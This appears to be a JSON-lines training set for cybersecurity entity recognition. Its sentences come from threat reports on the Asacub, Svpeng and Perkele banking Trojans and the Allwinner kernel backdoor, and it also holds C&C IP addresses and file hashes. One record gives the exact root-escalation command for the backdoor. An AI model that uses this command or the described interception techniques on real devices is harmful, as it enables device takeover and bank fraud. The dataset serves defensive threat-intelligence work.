{"text": "Moreover , incoming traffic from the C & C server began to use gzip compression , and the top-level domain for all C & Cs was .com : Since December 2016 , the changes in C & C communication methods have affected only how the relative path in the URL is generated : the pronounceable word was replaced by a rather long random combination of letters and numbers , for example , “ ozvi4malen7dwdh ” or “ f29u8oi77024clufhw1u5ws62 ” .", "spans": {}, "info": {"id": "cyner_train_001368", "source": "cyner_train"}}
{"text": "At the time of writing this article , no other significant changes in Asacub ’ s network behavior had been observed : The origin of Asacub It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps .", "spans": {"MALWARE: Asacub": [[70, 76], [132, 138], [173, 179]]}, "info": {"id": "cyner_train_001369", "source": "cyner_train"}}
{"text": "Communication between both Trojans and their C & C servers is based on the same principle , the relative addresses to which Trojans send network requests are generated in a similar manner , and the set of possible commands that the two Trojans can perform also overlaps .", "spans": {}, "info": {"id": "cyner_train_001370", "source": "cyner_train"}}
{"text": "The main difference is that Smaps transmits data as plain text , while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format .", "spans": {"MALWARE: Smaps": [[28, 33]], "MALWARE: Asacub": [[71, 77]]}, "info": {"id": "cyner_train_001372", "source": "cyner_train"}}
{"text": "Let ’ s compare examples of traffic from Smaps and Asacub — an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { “ id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” type ” : ” get ” , ” info ” : ” imei:365548770159066 , country : PL , cell : Tele2", "spans": {"MALWARE: Smaps": [[41, 46], [209, 214]], "MALWARE: Asacub": [[51, 57], [223, 229], [258, 264]]}, "info": {"id": "cyner_train_001373", "source": "cyner_train"}}
{"text": ", android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2″ } Data sent to the server [ { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416", "spans": {}, "info": {"id": "cyner_train_001374", "source": "cyner_train"}}
{"text": "1000 50″ , ” timestamp ” : ” 1452272572″ } } , { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” BALANCE ” , ” timestamp ” : ” 1452272573″ } } ] Instructions received from the server A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS ( encoded with the base64 algorithm ) from the device to the C & C server : Smaps", "spans": {}, "info": {"id": "cyner_train_001375", "source": "cyner_train"}}
{"text": "format Asacub format Decrypted data from Asacub traffic : { “ data ” : ” 2015:10:14_02:41:15″ , ” id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” text ” : ” SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= ” , ” number ” : ” 1790″ , ” type", "spans": {}, "info": {"id": "cyner_train_001376", "source": "cyner_train"}}
{"text": "” : ” load ” } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS .", "spans": {}, "info": {"id": "cyner_train_001377", "source": "cyner_train"}}
{"text": "The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device .", "spans": {}, "info": {"id": "cyner_train_001378", "source": "cyner_train"}}
{"text": "App icons under which Asacub masks itself The APK files of the Trojan are downloaded from sites such as mmsprivate [ .", "spans": {"MALWARE: Asacub": [[22, 28]]}, "info": {"id": "cyner_train_001381", "source": "cyner_train"}}
{"text": "] site , and mms4you [ .", "spans": {}, "info": {"id": "cyner_train_001384", "source": "cyner_train"}}
{"text": "For the Trojan to install , the user must allow installation of apps from unknown sources in the device settings .", "spans": {}, "info": {"id": "cyner_train_001386", "source": "cyner_train"}}
{"text": "Infection During installation , depending on the version of the Trojan , Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService .", "spans": {"MALWARE: Asacub": [[73, 79]]}, "info": {"id": "cyner_train_001387", "source": "cyner_train"}}
{"text": "After receiving the rights , it sets itself as the default SMS app and disappears from the device screen .", "spans": {}, "info": {"id": "cyner_train_001388", "source": "cyner_train"}}
{"text": "If the user ignores or rejects the request , the window reopens every few seconds .", "spans": {}, "info": {"id": "cyner_train_001389", "source": "cyner_train"}}
{"text": "The Trojan requests Device Administrator rights The Trojan requests permission to use AccessibilityService After installation , the Trojan starts communicating with the cybercriminals ’ C & C server .", "spans": {}, "info": {"id": "cyner_train_001390", "source": "cyner_train"}}
{"text": "All data is transmitted in JSON format ( after decryption ) .", "spans": {}, "info": {"id": "cyner_train_001391", "source": "cyner_train"}}
{"text": "It includes information about the smartphone model , the OS version , the mobile operator , and the Trojan version .", "spans": {}, "info": {"id": "cyner_train_001392", "source": "cyner_train"}}
{"text": "Structure of data sent to the server : To begin with , the Trojan sends information about the device to the server : In response , the server sends the code of the command for execution ( “ command ” ) , its parameters ( “ params ” ) , and the time delay before execution ( “ waitrun ” in milliseconds ) .", "spans": {}, "info": {"id": "cyner_train_001394", "source": "cyner_train"}}
{"text": "List of commands sewn into the body of the Trojan : Command code Parameters Actions 2 – Sending a list of contacts from the address book of the infected device to the C & C server 7 “ to ” : int Calling the specified number 11 “ to ” : int , “ body ” : string Sending an SMS with the specified text to the specified number 19 “ text ” : string , “ n ” : string Sending SMS with the specified text to numbers from the address book of the infected device , with the name of the addressee from the", "spans": {"SYSTEM: address book": [[124, 136], [417, 429]]}, "info": {"id": "cyner_train_001395", "source": "cyner_train"}}
{"text": "address book substituted into the message text 40 “ text ” : string Shutting down applications with specific names ( antivirus and banking applications ) The set of possible commands is the most significant difference between the various flavors of Asacub .", "spans": {"SYSTEM: address book": [[0, 12]], "MALWARE: Asacub": [[249, 255]]}, "info": {"id": "cyner_train_001396", "source": "cyner_train"}}
{"text": "In later versions , instead of the name of the command , its numerical code was transmitted .", "spans": {}, "info": {"id": "cyner_train_001398", "source": "cyner_train"}}
{"text": "The same numerical code corresponded to one command in different versions , but the set of supported commands varied .", "spans": {}, "info": {"id": "cyner_train_001399", "source": "cyner_train"}}
{"text": "For example , version 9.0.7 ( 2017 ) featured the following set of commands : 2 , 4 , 8 , 11 , 12 , 15 , 16 , 17 , 18 , 19 , 20 .", "spans": {}, "info": {"id": "cyner_train_001400", "source": "cyner_train"}}
{"text": "After receiving the command , the Trojan attempts to execute it , before informing C & C of the execution status and any data received .", "spans": {}, "info": {"id": "cyner_train_001401", "source": "cyner_train"}}
{"text": "Moreover , the Trojan intercepts SMS from the bank that contain one-time passwords and information about the balance of the linked bank card .", "spans": {}, "info": {"id": "cyner_train_001403", "source": "cyner_train"}}
{"text": "Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number .", "spans": {}, "info": {"id": "cyner_train_001404", "source": "cyner_train"}}
{"text": "What ’ s more , the user can not check the balance via mobile banking or change any settings there , because after receiving the command with code 40 , the Trojan prevents the banking app from running on the phone .", "spans": {}, "info": {"id": "cyner_train_001405", "source": "cyner_train"}}
{"text": "User messages created by the Trojan during installation typically contain grammatical and spelling errors , and use a mixture of Cyrillic and Latin characters .", "spans": {}, "info": {"id": "cyner_train_001406", "source": "cyner_train"}}
{"text": "The Trojan also employs various obfuscation methods : from the simplest , such as string concatenation and renaming of classes and methods , to implementing functions in native code and embedding SO libraries in C/C++ in the APK file , which requires the use of additional tools or dynamic analysis for deobfuscation , since most tools for static analysis of Android apps support only Dalvik bytecode .", "spans": {}, "info": {"id": "cyner_train_001407", "source": "cyner_train"}}
{"text": "In some versions of Asacub , strings in the app are encrypted using the same algorithm as data sent to C & C , but with different keys .", "spans": {"MALWARE: Asacub": [[20, 26]]}, "info": {"id": "cyner_train_001408", "source": "cyner_train"}}
{"text": "The Trojan also hit users from Ukraine , Turkey , Germany , Belarus , Poland , Armenia , Kazakhstan , the US , and other countries .", "spans": {}, "info": {"id": "cyner_train_001410", "source": "cyner_train"}}
{"text": "Conclusion The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme .", "spans": {"MALWARE: Asacub": [[23, 29]]}, "info": {"id": "cyner_train_001411", "source": "cyner_train"}}
{"text": "That said , so as to hinder detection of new versions , the Trojan ’ s APK file and the C & C server domains are changed regularly , and the Trojan download links are often one-time-use .", "spans": {}, "info": {"id": "cyner_train_001415", "source": "cyner_train"}}
{"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81", "spans": {}, "info": {"id": "cyner_train_001416", "source": "cyner_train"}}
{"text": "195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8", "spans": {}, "info": {"id": "cyner_train_001417", "source": "cyner_train"}}
{"text": "c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c", "spans": {}, "info": {"id": "cyner_train_001418", "source": "cyner_train"}}
{"text": "31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM", "spans": {"SYSTEM: ARM": [[255, 258]]}, "info": {"id": "cyner_train_001419", "source": "cyner_train"}}
{"text": "Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ?", "spans": {"SYSTEM: Android": [[47, 54]]}, "info": {"id": "cyner_train_001420", "source": "cyner_train"}}
{"text": "It is possibly one of the most frequently asked questions on the Internet .", "spans": {}, "info": {"id": "cyner_train_001421", "source": "cyner_train"}}
{"text": "Thanks to Allwinner , a Chinese ARM system-on-a-chip maker , which has recently been caught shipping a version of Linux Kernel with an incredibly simple and easy-to-use built-in backdoor .", "spans": {"ORGANIZATION: Allwinner": [[10, 19]], "SYSTEM: ARM": [[32, 35]], "SYSTEM: Linux": [[114, 119]]}, "info": {"id": "cyner_train_001423", "source": "cyner_train"}}
{"text": "Simple Backdoor Exploit to Hack Android Devices All you need to do to gain root access of an affected Android device is… Send the text \" rootmydevice '' to any undocumented debugging process .", "spans": {"SYSTEM: Android": [[32, 39], [102, 109]]}, "info": {"id": "cyner_train_001425", "source": "cyner_train"}}
{"text": "The local privileges escalation backdoor code for debugging ARM-powered Android devices managed to make its way in shipped firmware after firmware makers wrote their own kernel code underneath a custom Android build for their devices , though the mainstream kernel source is unaffected .", "spans": {"SYSTEM: ARM-powered": [[60, 71]], "SYSTEM: Android": [[72, 79], [202, 209]]}, "info": {"id": "cyner_train_001426", "source": "cyner_train"}}
{"text": "The backdoor code is believed to have been left by mistake by the authors after completing the debugging process .", "spans": {}, "info": {"id": "cyner_train_001427", "source": "cyner_train"}}
{"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices .", "spans": {"SYSTEM: Android": [[256, 263]], "ORGANIZATION: Allwinner": [[284, 293], [356, 365]], "SYSTEM: ARM": [[294, 297]], "SYSTEM: Linux": [[342, 347]], "SYSTEM: Banana Pi micro-PCs": [[392, 411]], "SYSTEM: Orange Pi": [[414, 423]]}, "info": {"id": "cyner_train_001428", "source": "cyner_train"}}
{"text": "At the forum of the Armbian operating system , a moderator who goes by the name Tkaiser noted that the backdoor code could remotely be exploitable \" if combined with networked services that might allow access to /proc .", "spans": {"SYSTEM: Armbian": [[20, 27]]}, "info": {"id": "cyner_train_001429", "source": "cyner_train"}}
{"text": "'' This security hole is currently present in every operating system image for A83T , H3 or H8 devices that rely on kernel 3.4 , he added .", "spans": {"SYSTEM: A83T": [[79, 83]], "SYSTEM: H3": [[86, 88]], "SYSTEM: H8": [[92, 94]], "SYSTEM: kernel 3.4": [[116, 126]]}, "info": {"id": "cyner_train_001430", "source": "cyner_train"}}
{"text": "This blunder made by the company has been frustrating to many developers .", "spans": {}, "info": {"id": "cyner_train_001431", "source": "cyner_train"}}
{"text": "David Manouchehri released the information about the backdoor through its own Github account ( Pastebin ) and then apparently deleted it .", "spans": {"ORGANIZATION: Github": [[78, 84]], "ORGANIZATION: Pastebin": [[95, 103]]}, "info": {"id": "cyner_train_001433", "source": "cyner_train"}}
{"text": "It is safe to say that today ’ s cybercriminal is no longer a lone hacker but part of a serious business operation .", "spans": {}, "info": {"id": "cyner_train_001435", "source": "cyner_train"}}
{"text": "There are various types of actors involved in the mobile malware industry : virus writers , testers , interface designers of both the malicious apps and the web pages they are distributed from , owners of the partner programs that spread the malware , and mobile botnet owners .", "spans": {}, "info": {"id": "cyner_train_001436", "source": "cyner_train"}}
{"text": "This division of labor among the cybercriminals can also be seen in the behavior of their Trojans .", "spans": {}, "info": {"id": "cyner_train_001437", "source": "cyner_train"}}
{"text": "In 2013 , there was evidence of cooperation ( most probably on a commercial basis ) between different groups of virus writers .", "spans": {}, "info": {"id": "cyner_train_001438", "source": "cyner_train"}}
{"text": "For example , the botnet Trojan-SMS.AndroidOS.Opfake.a , in addition to its own activity , also spread Backdoor.AndroidOS.Obad.a by sending spam containing a link to the malware to the victim ’ s list of contacts .", "spans": {"MALWARE: Trojan-SMS.AndroidOS.Opfake.a": [[25, 54]], "MALWARE: Backdoor.AndroidOS.Obad.a": [[103, 128]]}, "info": {"id": "cyner_train_001439", "source": "cyner_train"}}
{"text": "2013 in figures A total of 143,211 new modifications of malicious programs targeting mobile devices were detected in all of 2013 ( as of January 1 , 2014 ) .", "spans": {}, "info": {"id": "cyner_train_001441", "source": "cyner_train"}}
{"text": "In 2013 , 3,905,502 installation packages were used by cybercriminals to distribute mobile malware .", "spans": {}, "info": {"id": "cyner_train_001442", "source": "cyner_train"}}
{"text": "Android remains a prime target for malicious attacks .", "spans": {"SYSTEM: Android": [[0, 7]]}, "info": {"id": "cyner_train_001444", "source": "cyner_train"}}
{"text": "98.05 % of all malware detected in 2013 targeted this platform , confirming both the popularity of this mobile OS and the vulnerability of its architecture .", "spans": {}, "info": {"id": "cyner_train_001445", "source": "cyner_train"}}
{"text": "Most mobile malware is designed to steal users ’ money , including SMS-Trojans , and lots of backdoors and Trojans .", "spans": {}, "info": {"id": "cyner_train_001446", "source": "cyner_train"}}
{"text": "Over the year , the number of mobile malware modifications designed for phishing , the theft of credit card information and money increased by a factor of 19.7 .", "spans": {}, "info": {"id": "cyner_train_001447", "source": "cyner_train"}}
{"text": "In 2013 , Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans .", "spans": {"ORGANIZATION: Kaspersky Lab": [[10, 23]]}, "info": {"id": "cyner_train_001448", "source": "cyner_train"}}
{"text": "Methods and techniques 2013 not only saw a radical increase in output from mobile virus writers but also saw them actively applying methods and technologies that allowed cybercriminals to use their malware more effectively .", "spans": {}, "info": {"id": "cyner_train_001449", "source": "cyner_train"}}
{"text": "Infecting legal web resources help spread mobile malware via popular websites .", "spans": {}, "info": {"id": "cyner_train_001452", "source": "cyner_train"}}
{"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities .", "spans": {}, "info": {"id": "cyner_train_001457", "source": "cyner_train"}}
{"text": "Distribution via botnets .", "spans": {}, "info": {"id": "cyner_train_001458", "source": "cyner_train"}}
{"text": "We also registered one episode of mobile malware spreading via a third-party botnet .", "spans": {}, "info": {"id": "cyner_train_001460", "source": "cyner_train"}}
{"text": "Resistance to anti-malware protection The ability of malicious software to operate continuously on the victim ’ s mobile device is an important aspect of its development .", "spans": {}, "info": {"id": "cyner_train_001461", "source": "cyner_train"}}
{"text": "The longer a Trojan “ lives ” on a smartphone , the more money it will make for the owner .", "spans": {}, "info": {"id": "cyner_train_001462", "source": "cyner_train"}}
{"text": "The more complex the obfuscation , the longer it will take an antivirus solution to neutralize the malicious code .", "spans": {}, "info": {"id": "cyner_train_001465", "source": "cyner_train"}}
{"text": "Tellingly , current virus writers have mastered commercial obfuscators .", "spans": {}, "info": {"id": "cyner_train_001466", "source": "cyner_train"}}
{"text": "This implies they have made considerable investments .", "spans": {}, "info": {"id": "cyner_train_001467", "source": "cyner_train"}}
{"text": "For example , one commercial obfuscator , which cost €350 , was used for Trojans and Opfak.bo Obad.a Android vulnerabilities are used by criminals for three reasons : to bypass the code integrity check when installing an application ( vulnerability Master Key ) ; to enhance the rights of malicious applications , considerably extending their capabilities ; and to make it more difficult to remove malware .", "spans": {"MALWARE: Opfak.bo Obad.a": [[85, 100]]}, "info": {"id": "cyner_train_001468", "source": "cyner_train"}}
{"text": "For example , Svpeng uses a previously unknown vulnerability to protect itself from being removed manually or by the antivirus program .", "spans": {"MALWARE: Svpeng": [[14, 20]]}, "info": {"id": "cyner_train_001469", "source": "cyner_train"}}
{"text": "Cybercriminals also exploit the Master Key vulnerability and have learned to embed unsigned executable files in Android installation packages .", "spans": {"VULNERABILITY: Master Key vulnerability": [[32, 56]], "SYSTEM: Android": [[112, 119]]}, "info": {"id": "cyner_train_001470", "source": "cyner_train"}}
{"text": "Digital signature verification can be bypassed by giving the malicious file exactly the same name as a legitimate file and placing it on the same level in the archive .", "spans": {}, "info": {"id": "cyner_train_001471", "source": "cyner_train"}}
{"text": "However , many users are in no hurry to update the operating systems of their products .", "spans": {}, "info": {"id": "cyner_train_001474", "source": "cyner_train"}}
{"text": "If a smartphone or tablet was released more than a year ago , it is probably no longer supported by the manufacturer and patching of vulnerabilities is no longer provided .", "spans": {}, "info": {"id": "cyner_train_001475", "source": "cyner_train"}}
{"text": "Of course , this does not mean the digital signature of the software developer can be used .", "spans": {}, "info": {"id": "cyner_train_001478", "source": "cyner_train"}}
{"text": "However , due to the absence of certification centers verifying the digital signatures of Android programs , nothing prevents criminals from adding their own signature .", "spans": {}, "info": {"id": "cyner_train_001479", "source": "cyner_train"}}
{"text": "As a result , a copy of Angry Birds installed from an unofficial app store or downloaded from a forum could easily contain malicious functionality .", "spans": {"SYSTEM: Angry Birds": [[24, 35]]}, "info": {"id": "cyner_train_001480", "source": "cyner_train"}}
{"text": "Capabilities and functionality In 2013 , we detected several technological innovations developed and used by criminals in their malicious software .", "spans": {}, "info": {"id": "cyner_train_001481", "source": "cyner_train"}}
{"text": "Below are descriptions of some of the most interesting .", "spans": {}, "info": {"id": "cyner_train_001482", "source": "cyner_train"}}
{"text": "Control of malware from a single center provides maximum flexibility .", "spans": {}, "info": {"id": "cyner_train_001483", "source": "cyner_train"}}
{"text": "Botnets can make considerably more money than autonomous Trojans .", "spans": {}, "info": {"id": "cyner_train_001484", "source": "cyner_train"}}
{"text": "It comes as no surprise then that many SMS-Trojans include bot functionality .", "spans": {}, "info": {"id": "cyner_train_001485", "source": "cyner_train"}}
{"text": "According to our estimates , about 60 % of mobile malware are elements of both large and small mobile botnets .", "spans": {}, "info": {"id": "cyner_train_001486", "source": "cyner_train"}}
{"text": "Google Cloud Messaging is designed to send short message ( up to 4 KB ) to mobile devices via Google services .", "spans": {"SYSTEM: Google Cloud Messaging": [[0, 22]], "ORGANIZATION: Google": [[94, 100]]}, "info": {"id": "cyner_train_001488", "source": "cyner_train"}}
{"text": "The commands received via GCM can not be blocked immediately on an infected device .", "spans": {"SYSTEM: GCM": [[26, 29]]}, "info": {"id": "cyner_train_001490", "source": "cyner_train"}}
{"text": "We have detected several malicious programs using GCM for command and control – the widespread Trojan-SMS.AndroidOS.FakeInst.a , Trojan-SMS.AndroidOS.Agent.ao , and Trojan-SMS.AndroidOS.OpFake.a among others .", "spans": {"SYSTEM: GCM": [[50, 53]], "MALWARE: Trojan-SMS.AndroidOS.FakeInst.a": [[95, 126]], "MALWARE: Trojan-SMS.AndroidOS.Agent.ao": [[129, 158]], "MALWARE: Trojan-SMS.AndroidOS.OpFake.a": [[165, 194]]}, "info": {"id": "cyner_train_001491", "source": "cyner_train"}}
{"text": "Google is actively combating this use of the service , responding quickly to reports from antivirus companies and blocking the IDs of cybercriminals .", "spans": {"ORGANIZATION: Google": [[0, 6]]}, "info": {"id": "cyner_train_001492", "source": "cyner_train"}}
{"text": "Attacks on Windows XP allows mobile malware to infect a PC after connecting a smartphone or tablet .", "spans": {"SYSTEM: Windows XP": [[11, 21]]}, "info": {"id": "cyner_train_001493", "source": "cyner_train"}}
{"text": "In early 2013 we detected two identical applications on Google Play that were allegedly designed for cleaning the operating system of Android-based devices from unnecessary processes .", "spans": {"SYSTEM: Google Play": [[56, 67]], "SYSTEM: Android-based": [[134, 147]]}, "info": {"id": "cyner_train_001494", "source": "cyner_train"}}
{"text": "In fact , the applications are designed to download the autorun.inf file , an icon file and the win32-Trojan file , which the mobile malicious program locates in the root directory of an SD card .", "spans": {"SYSTEM: win32-Trojan": [[96, 108]], "SYSTEM: SD card": [[187, 194]]}, "info": {"id": "cyner_train_001495", "source": "cyner_train"}}
{"text": "We would like to emphasize that this method of attack only works on Windows XP and Android versions prior to 2.2 .", "spans": {"SYSTEM: Windows XP": [[68, 78]], "SYSTEM: Android": [[83, 90]]}, "info": {"id": "cyner_train_001498", "source": "cyner_train"}}
{"text": "The most advanced mobile malicious programs today are Trojans targeting users ’ bank accounts – the most attractive source of criminal earnings .", "spans": {}, "info": {"id": "cyner_train_001499", "source": "cyner_train"}}
{"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans .", "spans": {"SYSTEM: Android": [[92, 99]]}, "info": {"id": "cyner_train_001500", "source": "cyner_train"}}
{"text": "The cyber industry of mobile malware is becoming more focused on making profits more effectively , i.e. , mobile phishing , theft of credit card information , money transfers from bank cards to mobile phones and from phones to the criminalas ’ e-wallets .", "spans": {}, "info": {"id": "cyner_train_001501", "source": "cyner_train"}}
{"text": "Cybercriminals have become obsessed by this method of illegal earnings : at the beginning of the year we knew only 67 banking Trojans , but by the end of the year there were already 1321 unique samples .", "spans": {}, "info": {"id": "cyner_train_001502", "source": "cyner_train"}}
{"text": "Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans .", "spans": {"SYSTEM: Kaspersky Lab": [[0, 13]]}, "info": {"id": "cyner_train_001503", "source": "cyner_train"}}
{"text": "However , in 2013 , autonomous mobile banking Trojans developed further .", "spans": {}, "info": {"id": "cyner_train_001505", "source": "cyner_train"}}
{"text": "mobile_treats_2013_05s Infections caused by mobile banking programs Today , the majority of banking Trojan attacks affect users in Russia and the CIS .", "spans": {}, "info": {"id": "cyner_train_001507", "source": "cyner_train"}}
{"text": "However , this situation will not last long : given the cybercriminals ’ interest in user bank accounts , the activity of mobile banking Trojans is expected to grow in other countries in 2014 .", "spans": {}, "info": {"id": "cyner_train_001508", "source": "cyner_train"}}
{"text": "It can not act independently and operates strictly in accordance with commands received from the C & C server .", "spans": {}, "info": {"id": "cyner_train_001511", "source": "cyner_train"}}
{"text": "There the user is prompted to download and install a Trojan imitating an Adobe Flash Player update .", "spans": {"SYSTEM: Adobe Flash Player": [[73, 91]]}, "info": {"id": "cyner_train_001513", "source": "cyner_train"}}
{"text": "Svpeng is capable of doing lots of things .", "spans": {"MALWARE: Svpeng": [[0, 6]]}, "info": {"id": "cyner_train_001514", "source": "cyner_train"}}
{"text": "It collects information about the smartphone ( IMEI , country , service provider , operating system language ) and sends it to the host via the HTTP POST request .", "spans": {}, "info": {"id": "cyner_train_001515", "source": "cyner_train"}}
{"text": "This appears to be necessary to determine the number of banks the victim may use .", "spans": {}, "info": {"id": "cyner_train_001516", "source": "cyner_train"}}
{"text": "It steals SMS messages and information about voice calls .", "spans": {}, "info": {"id": "cyner_train_001519", "source": "cyner_train"}}
{"text": "It steals money from the victim ’ s bank account .", "spans": {}, "info": {"id": "cyner_train_001521", "source": "cyner_train"}}
{"text": "Svpeng sends the corresponding messages to the SMS services of two banks .", "spans": {"MALWARE: Svpeng": [[0, 6]]}, "info": {"id": "cyner_train_001524", "source": "cyner_train"}}
{"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance .", "spans": {"MALWARE: Svpeng": [[0, 6]]}, "info": {"id": "cyner_train_001525", "source": "cyner_train"}}
{"text": "If the phone is attached to a bank card , commands are sent from the C & C server with instructions to transfer money from the user ’ s bank account to his/her mobile account .", "spans": {}, "info": {"id": "cyner_train_001526", "source": "cyner_train"}}
{"text": "The cybercriminals then send this money to a digital wallet or to a premium number and cash it in .", "spans": {}, "info": {"id": "cyner_train_001527", "source": "cyner_train"}}
{"text": "It steals logins and passwords to online banking accounts by substituting he window displayed by the bank application .", "spans": {}, "info": {"id": "cyner_train_001528", "source": "cyner_train"}}
{"text": "Currently , this only affects Russian banks , but the technology behind Svpeng could easily be used to target other banking applications .", "spans": {"MALWARE: Svpeng": [[72, 78]]}, "info": {"id": "cyner_train_001529", "source": "cyner_train"}}
{"text": "The data entered by the user is sent to the cybercriminals .", "spans": {}, "info": {"id": "cyner_train_001532", "source": "cyner_train"}}
{"text": "In actual fact , the Trojan does not block anything and the phone can be used without any problems .", "spans": {}, "info": {"id": "cyner_train_001534", "source": "cyner_train"}}
{"text": "It hides traces of its activity by masking the outgoing and incoming text messages and blocking calls and messages from numbers belonging to the bank .", "spans": {}, "info": {"id": "cyner_train_001535", "source": "cyner_train"}}
{"text": "It is impossible to deprive it of these rights without the use of specialized tools ( such as Kaspersky Internet Security for Android ) .", "spans": {"SYSTEM: Kaspersky Internet Security": [[94, 121]], "SYSTEM: Android": [[126, 133]]}, "info": {"id": "cyner_train_001539", "source": "cyner_train"}}
{"text": "To protect itself from being removed , Svpeng uses a previously unknown vulnerability in Android .", "spans": {"MALWARE: Svpeng": [[39, 45]], "SYSTEM: Android": [[89, 96]]}, "info": {"id": "cyner_train_001540", "source": "cyner_train"}}
{"text": "But , as we have already mentioned , the criminals could easily turn their attention to users in other countries .", "spans": {}, "info": {"id": "cyner_train_001543", "source": "cyner_train"}}
{"text": "Perkele and Wroba Foreign users have also been on the receiving end of several malicious innovations targeting bank accounts .", "spans": {"MALWARE: Perkele": [[0, 7]], "MALWARE: Wroba": [[12, 17]]}, "info": {"id": "cyner_train_001544", "source": "cyner_train"}}
{"text": "It is of interest primarily because it operates in conjunction with various banking win32-Trojans .", "spans": {"SYSTEM: win32-Trojans": [[84, 97]]}, "info": {"id": "cyner_train_001546", "source": "cyner_train"}}
{"text": "Its main task is to bypass the two-factor authentication of the client in the online banking system .", "spans": {}, "info": {"id": "cyner_train_001547", "source": "cyner_train"}}
{"text": "Due to the specific nature of its activity , Perkele is distributed in a rather unusual way .", "spans": {"MALWARE: Perkele": [[45, 52]]}, "info": {"id": "cyner_train_001548", "source": "cyner_train"}}
{"text": "When a user enters an Internet banking site on a computer infected by banking malware ( ZeuS , Citadel ) , a request about the smartphone number and type of operating system is injected into the code of the authentication page .", "spans": {"MALWARE: ZeuS": [[88, 92]], "MALWARE: Citadel": [[95, 102]]}, "info": {"id": "cyner_train_001549", "source": "cyner_train"}}
{"text": "After scanning the QR code and installing a component downloaded from the link , the user infects his smartphone with the Trojan program that boasts functionality that is of great interest to the attackers .", "spans": {}, "info": {"id": "cyner_train_001551", "source": "cyner_train"}}
{"text": "Perkele intercepts mTANs ( confirmation codes for banking operations ) sent by the bank via text message .", "spans": {"MALWARE: Perkele": [[0, 7]]}, "info": {"id": "cyner_train_001552", "source": "cyner_train"}}
{"text": "By using the login and password stolen from the browser , the Windows Trojan initiates a fake transaction while Perkele intercepts ( via the C & C server ) the mTAN sent by the bank to the user .", "spans": {"MALWARE: Perkele": [[112, 119]]}, "info": {"id": "cyner_train_001553", "source": "cyner_train"}}
{"text": "Money then disappears from the victim ’ s account and is cashed in without the owner ’ s knowledge .", "spans": {}, "info": {"id": "cyner_train_001554", "source": "cyner_train"}}
{"text": "The Korean malware Wroba , in addition to the traditional vector of infection via file-sharing services , spreads via alternative app stores .", "spans": {"MALWARE: Wroba": [[19, 24]]}, "info": {"id": "cyner_train_001555", "source": "cyner_train"}}
{"text": "However , they possess no banking functions , and merely steal the logins and passwords entered by users .", "spans": {}, "info": {"id": "cyner_train_001559", "source": "cyner_train"}}
{"text": "We also discovered and analyzed live , misconfigured malicious command and control servers ( C2 ) , from which we were able to identify how the attacker gets new , infected apps to secretly install and the types of activities they are monitoring .", "spans": {}, "info": {"id": "cyner_train_001563", "source": "cyner_train"}}
{"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and safety of the victims ) as well as the types of exfiltrated content .", "spans": {}, "info": {"id": "cyner_train_001564", "source": "cyner_train"}}
{"text": "In aggregate , the type of information stolen could let an attacker know where a person is , with whom they are associated ( including contacts ’ profile photos ) , the messages they are sending , the websites they visit and search history , screenshots that reveal data from other apps on the device , the conversations they have in the presence of the device , and a myriad of images including anything at which device ’ s camera is pointed .", "spans": {}, "info": {"id": "cyner_train_001565", "source": "cyner_train"}}
